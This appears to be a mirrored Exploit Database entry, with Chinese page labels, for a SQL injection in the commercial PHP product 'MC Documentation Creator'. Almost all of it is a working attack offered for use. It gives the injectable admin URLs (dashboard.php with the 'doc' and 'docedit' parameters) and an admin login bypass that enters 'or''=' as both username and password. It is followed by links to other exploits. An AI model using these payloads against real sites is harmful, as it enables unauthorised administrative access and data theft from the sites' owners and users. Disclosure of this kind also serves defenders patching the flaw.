MC Documentation Creator Script – SQL Injection

Exploit Database
79 阅读

作者： Ihsan Sencan

日期： 2017-01-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/41071/

# # # # # 
# Vulnerability: SQL Injection Web Vulnerability
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Documentation Creator
# Script Buy Now: http://microcode.ws/product/mc-documentation-creator-php-script/3890
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# SQL Injection/Exploit :
# http://localhost/[PATH]/admin/dashboard.php?doc=[SQL]
# http://localhost/[PATH]/admin/dashboard.php?docedit=[SQL]
# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
# 
# Admin Login Bypass
# http://localhost/[PATH]/admin/ and set Usename:'or''=' and Password to 'or''=' and hit enter.
# # # # #

last Exploits
MC Documentation Creator Script – SQL Injection的更多信息

ManageEngine ServiceDesk Plus 8.0.0 Build 8013 – Improper User Privileges：
WordPress Plugin jetpack – ‘sharedaddy.php’ ID SQL Injection：
Coppermine Photo Gallery 1.4.14 – ‘picEditor.php’ Command Execution (Metasploit)：
FS Makemytrip Clone 1.0 – ‘fl_orig’ / ‘fl_dest’ SQL Injection：
WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery：
Metabase 0.46.6 – Pre-Auth Remote Code Execution：
MV Video Sharing Software 1.2 – ‘searchname’ SQL Injection：
Preisschlacht 4.0 Flash System – ‘index.php?aid’ SQL Injection：